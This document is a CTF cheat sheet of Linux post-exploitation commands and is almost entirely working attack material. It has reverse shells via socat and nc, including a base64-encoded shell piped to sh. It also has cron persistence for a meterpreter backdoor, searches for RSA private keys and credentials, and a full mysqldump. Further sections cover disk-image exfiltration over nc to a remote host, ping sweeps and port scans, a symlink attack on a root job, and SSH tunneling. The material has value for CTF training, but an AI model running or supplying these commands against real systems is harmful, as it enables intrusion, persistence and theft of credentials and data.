Command line scripts for CTF's

instructions.md

Command line scripts for CTF's

Linux

Improve shell

• Improve the prompt:

bash -i

• Enable history (on a ssh server)

bash -i;
DIR=`mktemp -d /tmp/ctf_XXX`
cd "${DIR}"
export HISTFILE=`pwd`/.bash_history
set -o history

Real tty, through socat

reverse_client:

LHOST="<IP>"
LPORT="<PORT>"
cd /tmp
curl https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat -o socat
chmod u+rwx socat
./socat exec:bash -li,pty,stderr,setsid,sigint,sane tcp:${LHOST}:${LPORT}

server (LHOST):

socat file:`tty`,raw,echo=0 tcp-listen:8881

Reverse shell handler (multi window/pane)

• Multi window server
  • Requires: tmux and ncat

Reverse shell server:

PORT=4444
ncat -lkv -v "${PORT}" -c "
        s=\$(mktemp -u -d `pwd`/socket.\${NCAT_REMOTE_ADDR}.\${NCAT_REMOTE_PORT}.XXX);
        # tmux new-window \"ncat -lU \$s; read\";
        tmux split-window -h \"ncat -lU \$s; read\";
        sleep 1;
        ncat -U \$s;
        rm \$s;"

Whoami?

• Whats my user, what are my groups?
  • Check if you are for example if you are a:
    • Member of disk => read the raw disk!
    • Member of lxd or docker => create a container mounting the root partition.
    • Member of adm => read log files for more information.

id

• What are all the users?
  • Check if there are any interesting users

cat /etc/passwd

• What are all the groups?
  • Are there any interesting groups? Who is a member

cat /etc/group

• What are the capabilities of this proces?

cat /proc/self/status | grep CapEff | cut -f2 | xargs -i capsh --decode={}

What sort of release

• What sort of machine is this?

uname -a
cat /etc/issue
cat /etc/lsb-release
cat /etc/motd

• Use searchsploit to look for Kernel / Distibution exploits

searchsploit 16.04
searchsploit Ubuntu

PTY

/usr/bin/python -c 'import pty; pty.spawn("/bin/sh")'
/usr/bin/python2 -c 'import pty; pty.spawn("/bin/sh")'
/usr/bin/python3 -c 'import pty; pty.spawn("/bin/sh")'

Sudo

• Check if we can see sudo permissions

sudo -l
cat /etc/sudoers
cat /etc/sudoers.d/*

Keep shell

• Schedule your connect back exploit

BACKDOOR='/tmp/meterpreter'; (crontab -l 2>/dev/null; echo "*/1 * * * * ${BACKDOOR}") | crontab -

nc (without -e) shell

IP=10.0.0.1;PORT=12345;PIPE=$(mktemp -u);mkfifo ${PIPE};cat ${PIPE}|/bin/sh -i 2>&1|nc ${IP} ${PORT} > ${PIPE}

• Or as base64

echo SVA9MTAuMC4wLjE7UE9SVD0xMjM0NTtta2ZpZm8gL3RtcC9maWZvO2NhdCAvdG1wL2ZpZm98L2Jpbi9zaCAtaSAyPiYxfG5jICR7SVB9ICR7UE9SVH0gPiAvdG1wL2ZpZm8= | base64 -d | sh

Priv ESC?

• Checkout:
  • https://gtfobins.github.io/
  • https://github.com/rebootuser/LinEnum
  • https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite

Finding

• Manual (additional labour):

#!/bin/bash

BREAK="#------------------------------#"

EXCLUDED=(
    '^/sys' 
    '^/proc' 
    '^/usr/share'
    '^/var/lib'
    '/include/'
    '^/var/lib/dpkg/' 
    '^/usr/src/linux-headers-' 
    '^/var/cache/man/' 
    '^/var/cache/apt/archives/'
    '^/etc/fonts/'
    '^/usr/share/fonts/'
    '^/usr/share/icons/'
    '^/usr/share/man/'
    '^/lib/modules/'
    )
EXCLUDED=$( IFS=$'|'; echo "${EXCLUDED[*]}" )

echo "# SUID files:"
echo "${BREAK}"
find / -perm -4000 -type f 2>/dev/null | grep -Ev "${EXCLUDED[*]}" | xargs -L 1 ls -alhtr

echo "# Find files with added capabilities"
echo "${BREAK}"
getcap -r /* 2>/dev/null

echo "# Writable files:"
echo "${BREAK}"
find / -writable -type f 2>/dev/null | grep -Ev "${EXCLUDED[*]}" | xargs -L 1 ls -alhtr 

echo "# Readable files:"
echo "${BREAK}"
find / -readable -type f 2>/dev/null | grep -Ev "${EXCLUDED[*]}" | xargs -L 1 ls -alhtr 

echo "# Writeable socket files:"
echo "${BREAK}"
find / -type s -writable 2>/dev/null

echo "# Hidden files:"
echo "${BREAK}"
find / -name ".*" -ls 2>/dev/null | grep -vE ' /sys/| /proc/'

echo "# Cronjob files:"
echo "${BREAK}"
find /etc/cron* -ls 2>/dev/null
crontab -l

echo "# Find RSA private key files:"
echo "${BREAK}"
grep -Hnr '\-----BEGIN RSA PRIVATE KEY-----' /etc/ /home /root /var 2>/dev/null

echo "# Find git repositories"
echo "${BREAK}"
find / -type d -name '.git' -ls 2>/dev/null

echo "# Find git repositories, with historic RSA private keys files"
echo "${BREAK}"
find / -name .git | (while read gitdir; do echo ${gitdir}; (git --git-dir "${gitdir}" log -p | grep '\-----BEGIN RSA PRIVATE KEY-----'  ); done)

• Search for configuration/credentials in the web folder /var/www/html

Finding files not in packages (dpkg based)

DIR=`mktemp -d`
cd $DIR
dpkg-query -W -f='${Package}\n' | xargs dpkg -L | sort -u > package_files
find / -type f 2>/dev/null | grep -v /proc/ | grep -v /sys/ | grep -v /dev/ | grep -v /boot/ | grep -vE /run/ | sort -u > find_files
awk 'FNR==NR{ array[$0];next}
 { if ( $1 in array ) next
   print $1}
' "package_files" "find_files" | less

Finding loaded kernel module files

lsmod | awk '{print $1}' | xargs  modinfo | grep filename | awk '{print $2}'

Finding vulnerable packages

• Create an account on https://vulners.com/
• Login
• Go to Products (top) -> Audit
• Go to Manual Audit
• Follow the instructions

SQL

• Dump SQL database using credentials
  • Notice the password is attached to the -p parameter
  • Notice the locking is disabled

USERNAME=admin
PASSWORD=mysqld4tb4s3p4ssw0rd
mysqldump --all-databases -u "${USERNAME}" -p"${PASSWORD}" --lock-tables=false > /tmp/mysqldump.sql

• Search for credentials in the dump

Process monitoring (cronjobs)

• List all processes

ps auxw

• Monitor the processes:

#!/bin/bash

PSCMD="ps -eo user,command"
PREVPROC=$(eval $PSCMD)

#loop by line
IFS=$'\n'

while true; do
    CURPROC=$(eval $PSCMD)
    diff <(echo "$PREVPROC") <(echo "$CURPROC")
    PREVPROC=$CURPROC
done

• Alternative:

#!/bin/bash

PSCMD="ps --no-headers -eo user,command | sort -u"
echo "${PSCMD}"
eval "${PSCMD}"
PROC1=$(eval ${PSCMD})

echo "${PROC1}"

while true; do
    PROC2=$(eval ${PSCMD})
    PROC2=$(echo "${PROC1}"$'\n'"${PROC2}" | sort -u)
    diff <(echo "$PROC1") <(echo "$PROC2")
    PROC1=$PROC2
    echo "${PROC1}" > procs.txt
done

Network recon

• Investigate the network

# Configuration of interfaces
cat /etc/network/interfaces
cat /etc/network/interfaces.d/*
#  Interfaces and addresses 
/sbin/ifconfig -a
/sbin/ip addr
#  Routing 
/sbin/route -n
/sbin/ip route
# Routing alternative view
cat /proc/self/net/fib_trie
# Neigbours
/sbin/ip neigh
/usr/sbin/arp -an
# Listening connections
netstat -tulpn
ss -tulpn
# All connections
netstat -pn
ss -pn

• Ping sweep
  • Use this sweep on the local network to see if the ARP table show new neigbours
  • Specify the correct rang

RANGE=192.168.122
for i in $(seq 1 254); do ping -c1 -w1 ${RANGE}.${i} & done
sleep 10
arp -an | grep -v incomplete | sed 's/.*(\(.*\)).*/\1/g' | grep "${RANGE}"

• Ping sweep IPv6

INTERFACE=eth0
ping6 -c 4 ff02::1%${INTERFACE}
sleep 2
ip neigh

• Scan a host using nc

IP=192.168.122.1
nc -zv ${IP} 1-65535 2>&1 | grep -v refused

• Sweep and scan, combining the above

RANGE=192.168.122
PERHOSTTIMEOUT=$((2*60))
PERPORTTIMEOUT=$((1*1))
for i in $(seq 1 254); do (ping -c1 -w1 ${RANGE}.${i} >/dev/null 2>&1 &); done
sleep 10
IPS=$(arp -an | grep -v incomplete | sed 's/.*(\(.*\)).*/\1/g' | grep "${RANGE}")
for IP in $IPS
do
  echo "[+] Scanning: ${IP}"
  timeout "${PERHOSTTIMEOUT}" nc -zvw ${PERPORTTIMEOUT} ${IP} 1-65535 2>&1 | grep -vE 'refused|timed out'
  echo "[+] Done: ${IP}"
done

Copy files to a shell

• Use base64 from the terminal:

source

FILE=/tmp/source_file
cat "${FILE}" | base64 -w 0
# Or compressed
cat "${FILE}" | gzip | base64 -w 0

• Copy the base64 output

destination

OUTPUTFILE=/tmp/output
echo PASTEBASE64 | base64 -d > "${OUTPUTFILE}"
# Or compressed
echo PASTEBASE64 | gunzip | base64 -d > "${OUTPUTFILE}"

• Transport a disk image through ssh

ssh username@10.10.10.1 'dd if=/dev/sda1 | gzip -1 -' | dd of=image.gz

• Or through nc

source

dd if=/dev/mapper/machine-vg-root | gzip -1 - | nc 10.10.14.1 1234

destination

nc -vl 1234 | gunzip > filesystem.raw

• Upload through meterpreter

meterpreter > /tmp/upload /tmp/myupload

PROC

• What can we see in /proc

• The memory mapping; where is the stack, where are the binaries, where is the heap?

cat /proc/self/maps

# Or from other processes:
MIN=1
MAX=4000
for i in $(seq $MIN $MAX); do cat /proc/${i}/maps 2>/dev/null && echo That was process: ${i} ; done

• Find the command line arguments of processes, without ps

cat /proc/self/cmdline

# Or from other processes:
MIN=1
MAX=4000
for i in $(seq $MIN $MAX); do (cat /proc/${i}/cmdline 2>/dev/null | sed 's/\x00/ /g' | sed 's/$/\n/g' ) ; done

Symlink attacks

• Found a job that overwrites using root or another user? Try to find symlink attacks.
• Example:
  • root copies /src to /dst and places permission on /dst
  • we have write privileges on /dst
  • we can try to rm /dst and ln -s /src /dst
  • Once the root job fires, root will overwrite /src with itself (fails) and give write perms on /src
  • Now we control /src we can define what we copy where?
  • For instance ln -s /root/root.flag /src and rm /dst; mkdir /dst
  • THe flag will now be copied to /dst

Tunneling

• We can tunnel through an ssh connection, in this example:
  • Once ssh is connected, connecting to localhost:4444 will port forward through the ssh connection to 192.168.122.1:80

LPORT=4444
RHOST=192.168.122.1
RPORT=80
ssh user@10.10.10.1 -L $LPORT:$RHOST:$RPORT

• Meterpreter

portfwd add -l 4444 -r 192.168.122.1 -p 80